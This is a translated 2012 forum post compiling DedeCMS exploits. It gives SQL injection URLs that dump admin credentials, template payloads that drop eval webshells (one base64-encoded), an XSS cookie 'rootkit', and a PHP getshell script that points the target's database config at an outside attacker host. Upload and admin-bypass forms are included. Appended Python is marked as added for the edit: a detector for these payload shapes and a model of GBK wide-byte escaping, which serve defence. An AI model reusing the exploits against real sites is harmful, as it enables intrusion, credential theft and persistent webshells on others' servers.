DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After posting, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line webshell written directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; visiting it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar block URL-type XSS, so the XSS filter needs to be switched off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; whichever of the URLs below you then visit, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>

DedeCms v5.6-5.7 unauthorised access vulnerability (straight into the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you are taken straight into the site backend.
This vulnerability requires first obtaining the backend path.

Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit with the form below and the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
Register a user, go into the member backend, post an article, upload an image, then in attachment management replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just posted, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(constructed here)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, we have changed the template path.
3. Visit the edited article: assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after upload the image is saved as /uploads/userup/3/1.gif
Post an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character MD5; from that, remove 3 characters from the front and 1 from the end to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialised page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric field overflow that raises an error, combined with DEDECMS logging database error messages to a PHP file without validating the file header.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is visible.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
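The payloads in this post fall into two shapes a defender can key detection on: request parameters whose PHP bracket key walks into a superglobal or a cfg_ setting (the _COOKIE[GLOBALS][cfg_dbhost] and _POST[GLOBALS][cfg_dbhost] payloads against mytag_js.php and login.php, and the cfg_basedir/cfg_imgtype fields sent to select_soft_post.php), and SQL fragments carried in a key or a value (rss.php, where the injection rides in the array key; advancedsearch.php with its `#@__` prefix macro; feedback_js.php and infosearch.php with UNION SELECT against dede_admin). The Python below is an added example written for this edit, not code from the post or from DedeCMS. The sample requests are constructed: example.invalid and the 203.0.113.0/24 addresses are placeholders, and the payload strings only mimic the shapes quoted above. It decodes each parameter to raw bytes (so a lone GBK lead byte before a quote stays visible), expands PHP bracket notation into a key path, and tags each request.

```python
import re
from urllib.parse import unquote_to_bytes

# PHP superglobal names. A request key whose bracket path passes through one
# of these (e.g. _COOKIE[GLOBALS][cfg_dbhost]) is reaching for application
# state rather than supplying ordinary form data.
SUPERGLOBALS = {"GLOBALS", "_GET", "_POST", "_COOKIE", "_REQUEST",
                "_SERVER", "_ENV", "_FILES", "_SESSION"}

# Indicators drawn from the payload shapes in the post. They run on both keys
# and values because rss.php is injected through the array *key*.
SQLI_PATTERNS = [
    ("union-select",       re.compile(r"union\s+(all\s+)?select", re.I)),
    ("error-based-xml",    re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("dede-prefix-macro",  re.compile(r"#@__")),             # DedeCMS table-prefix macro
    ("admin-table",        re.compile(r"\bdede_admin\b", re.I)),
    ("comment-terminator", re.compile(r"/\*|--\s|\)\s*#|'\s*#")),
    ("wide-byte-quote",    re.compile(r"[\x81-\xfe]['\"]")),  # GBK lead byte before a quote
]


def decode_component(raw: str) -> str:
    """Percent-decode to bytes, then map each byte to one character (latin-1)
    so multibyte sequences and lone high bytes remain visible to the regexes."""
    return unquote_to_bytes(raw.replace("+", " ")).decode("latin-1")


def parse_form(encoded: str):
    """Split a query string or urlencoded body into decoded (key, value) pairs.
    Done by hand rather than with parse_qsl so undecodable bytes cannot raise."""
    pairs = []
    for part in encoded.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((decode_component(key), decode_component(value)))
    return pairs


def php_key_path(key: str):
    """Expand PHP bracket notation: 'a[b][c]' -> ['a','b','c'], 'a[]' -> ['a','']."""
    root, bracket, rest = key.partition("[")
    path = [root]
    while bracket:
        segment, _, rest = rest.partition("]")
        path.append(segment)
        _, bracket, rest = rest.partition("[")
    return path


def triage_request(target: str, body: str = ""):
    """Return the sorted list of indicator tags found in one request
    (request target with optional query string, plus an optional POST body)."""
    _, _, query = target.partition("?")
    tags = set()
    for encoded in (query, body):
        for key, value in parse_form(encoded):
            path = php_key_path(key)
            if any(seg in SUPERGLOBALS for seg in path):
                tags.add("overwrite:superglobal-path")
            if any(seg.startswith("cfg_") for seg in path):
                tags.add("overwrite:cfg-key")
            for text in (key, value):
                for name, rx in SQLI_PATTERNS:
                    if rx.search(text):
                        tags.add("sqli:" + name)
    return sorted(tags)


# Constructed sample traffic (not taken from the post): placeholder hosts and
# addresses, payload shapes modelled on the ones described above.
SAMPLE_REQUESTS = {
    "rss-errorbased": (
        "/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,(SELECT%20uname%20FROM%20dede_admin),1)%23'][0]=1", ""),
    "mytag-overwrite": (
        "/plus/mytag_js.php?aid=1",
        "doaction=http%3A%2F%2Fexample.invalid%2Fplus%2Fmytag_js.php%3Faid%3D1"
        "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.5"
        "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=attacker&nocache=true"),
    "login-overwrite": (
        "/dede/login.php?dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=203.0.113.5", ""),
    "softpost-cfg": (
        "/include/dialog/select_soft_post.php",
        "activepath=%2Fdata%2Fcache%2F&cfg_basedir=..%2F..%2F&cfg_imgtype=php&job=upload&newname=x.php"),
    "advancedsearch": (
        "/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60", ""),
    "infosearch-widebyte": (
        "/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*", ""),
    "benign-listing": ("/plus/list.php?tid=3&PageNo=2", ""),
}


def triage_all(requests=SAMPLE_REQUESTS):
    """Tag every sample request; returns {label: [tags]}."""
    return {label: triage_request(*req) for label, req in requests.items()}


if __name__ == "__main__":
    for label, tags in triage_all().items():
        print(f"{label:22s} {', '.join(tags) or '-'}")
```

The structural check on the key path is the one worth keeping even if the SQL signatures are tuned away: no legitimate DedeCMS form ever submits a field whose name begins with a superglobal, GLOBALS or cfg_, so that rule has essentially no benign matches and covers every variable-overwrite payload on this page regardless of which script receives it.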
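The "Dede 5.6 GBK SQL injection" entry and the `%cf'` prefix in the infosearch.php payload both rest on the same mechanism: a byte-oriented escaper such as PHP's addslashes() inserts a backslash (0x5C) in front of an attacker's quote, and 0x5C is a valid GBK trail byte, so the lead byte the attacker placed before the quote swallows the backslash and the quote closes the string literal. The Python below is an added example written for this edit, not code from the post or from DedeCMS or MySQL. It models two escapers and a minimal GBK string-literal scanner; the charset-aware escaper follows the documented rule of MySQL's client-side escaping once the connection charset is gbk (a lead byte with no valid trail byte is itself escaped), and the `dede_member` query string and HOSTILE_UID value are constructed for illustration.

```python
# GBK two-byte character: lead 0x81-0xFE, trail 0x40-0x7E or 0x80-0xFE.
def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE


def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE


SPECIAL = b"'\"\\"   # bytes both escapers put a backslash in front of


def naive_escape(data: bytes) -> bytes:
    """Byte-oriented escaping in the style of PHP addslashes(): a backslash
    goes in front of every quote or backslash, with no notion of charset."""
    out = bytearray()
    for b in data:
        if b in SPECIAL:
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def gbk_escape(data: bytes) -> bytes:
    """Charset-aware escaping, modelled on MySQL client escaping with the
    connection charset set to gbk: a complete two-byte character is copied as
    a unit, and a lead byte NOT followed by a valid trail byte is itself
    escaped, so it can never pair up with the backslash inserted before the
    quote that follows it."""
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if is_gbk_lead(b):
            if i + 1 < n and is_gbk_trail(data[i + 1]):
                out += data[i:i + 2]
                i += 2
                continue
            out += bytes([0x5C, b])   # orphan lead byte: escape it
            i += 1
            continue
        if b in SPECIAL:
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)


def gbk_literal_end(body: bytes) -> int:
    """Index at which a gbk-charset single-quoted literal (opening quote
    already consumed) closes, following the server-side lexer's rules: a
    valid two-byte character is skipped whole, a backslash skips the next
    byte, an unescaped single quote ends the literal. Returns len(body) when
    the literal never closes inside body."""
    i, n = 0, len(body)
    while i < n:
        b = body[i]
        if is_gbk_lead(b) and i + 1 < n and is_gbk_trail(body[i + 1]):
            i += 2
        elif b == 0x5C:
            i += 2
        elif b == 0x27:
            return i
        else:
            i += 1
    return n


def injected_tail(value: bytes, escape) -> bytes:
    """Escape a user-supplied value as it would be spliced into WHERE uid='...'
    and return the part of the escaped value the server would read as SQL
    rather than as string content. Empty means the value stayed inside the
    literal."""
    escaped = escape(value)
    return escaped[gbk_literal_end(escaped):]


# Constructed input: a GBK lead byte immediately followed by the attacker's quote.
HOSTILE_UID = b"\xbf' OR 1=1 -- "

if __name__ == "__main__":
    for name, fn in (("addslashes-style", naive_escape), ("gbk-aware", gbk_escape)):
        query = b"SELECT uid FROM dede_member WHERE uid='" + fn(HOSTILE_UID) + b"'"
        print(name, query, "-> parsed as SQL:", injected_tail(HOSTILE_UID, fn))
```

The second thing the block shows is that the naive escaper is not merely unsafe but wrong: a legitimate GBK character whose trail byte happens to be 0x5C (縗, bytes BF 5C) gets a spurious backslash inserted into the middle of it. The robust fix is to stop assembling SQL from strings at all and bind the value as a parameter; where escaping is unavoidable, the escaper must be told the connection charset through the driver rather than via a bare SET NAMES.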